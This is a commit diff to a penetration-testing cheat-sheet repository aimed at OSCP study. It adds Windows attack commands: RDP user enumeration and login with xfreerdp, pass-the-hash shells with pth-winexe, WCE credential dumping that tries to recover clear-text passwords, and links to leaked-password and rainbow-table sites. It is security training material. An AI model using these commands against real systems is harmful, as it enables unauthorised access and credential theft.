new windows tricks

dadav22 · Aug 9, 2018 · 1cb7938 · 1cb7938
1 parent 5f6822b
commit 1cb7938
Show file tree

Hide file tree

Showing 4 changed files with 46 additions and 3 deletions.
diff --git a/CheatSheets/RDP/readme.md b/CheatSheets/RDP/readme.md
@@ -1,12 +1,19 @@
 # Remote Desktop Protocol
 
-## Simple User Enumeration for Windows Target (kerberos based)
+## xfreerdp
+### Simple User Enumeration for Windows Target (kerberos based)
 
 xfreerdp /v:<target_ip> -sec-nla /u:""
 
 `xfreerdp /v:192.168.0.32 -sec-nla /u:""`
 
-## Wordlist based bruteforce
+## login
+
+xfreerdp /u:<user> /g:<domain> /p:<pass> /v:<target_ip>
+
+`xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34`
+
+### Wordlist based bruteforce
 
 ### NCRACK
 

diff --git a/CheatSheets/shell/readme.md b/CheatSheets/shell/readme.md
@@ -0,0 +1,14 @@
+# Windows Shell
+
+## pth-winexe
+
+### With Pass
+
+pht-winexe -U <user>%<pass> //Target_IP cmd
+
+`pth-winexe -U bob%alice //172.10.1.60 cmd`
+
+### Pass The Hash 
+
+`pth-winexe -U bob%hash //172.16.1.60 cmd`
+
diff --git a/CheatSheets/windows/hashdump/readme.md b/CheatSheets/windows/hashdump/readme.md
@@ -32,7 +32,24 @@ Donwload sam and system.
 
 ### FGDump
 
-FGDUMP Kali Path:  /usr/share/windows-binaries/fgdump/fgdump.exe
+Kali Path:  /usr/share/windows-binaries/fgdump/fgdump.exe
+
+
+### WCE
+
+Kali Paths:
+* /usr/share/wce/wce32.exe
+* /usr/share/wce/wce64.exe
+* /usr/share/wce/wce-universal.exe
+
+Get pass
+
+`wce-universal.exe `
+
+Try to get pass into clear text
+
+`wce-universal.exe -w`
+
 
 
 

diff --git a/README.md b/README.md
@@ -22,6 +22,7 @@ This repo also helps who trying to get OSCP. You'll find many ways to do somethi
   * System-Network
     * [RDP](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/RDP)
     * [Pass-the-hash](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/pass_the_hash/)
+    * [Windows-shell](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/shell)
   * WEB
       * [Web-Remote-Code-Execution](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/RCE)
       * [encode](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/CheatSheets/encode)
@@ -43,6 +44,10 @@ This repo also helps who trying to get OSCP. You'll find many ways to do somethi
 * Default Password
   * [DefaultPassword](http://www.defaultpassword.com/)
   * [RouterPassword](http://www.routerpasswords.com/)
+* Leak
+  * [Pastebin](https://pastebin.com)
+* Tables
+  * [RainbowCrack](https://project-rainbowcrack.com/table.htm)
 
 ## Contribution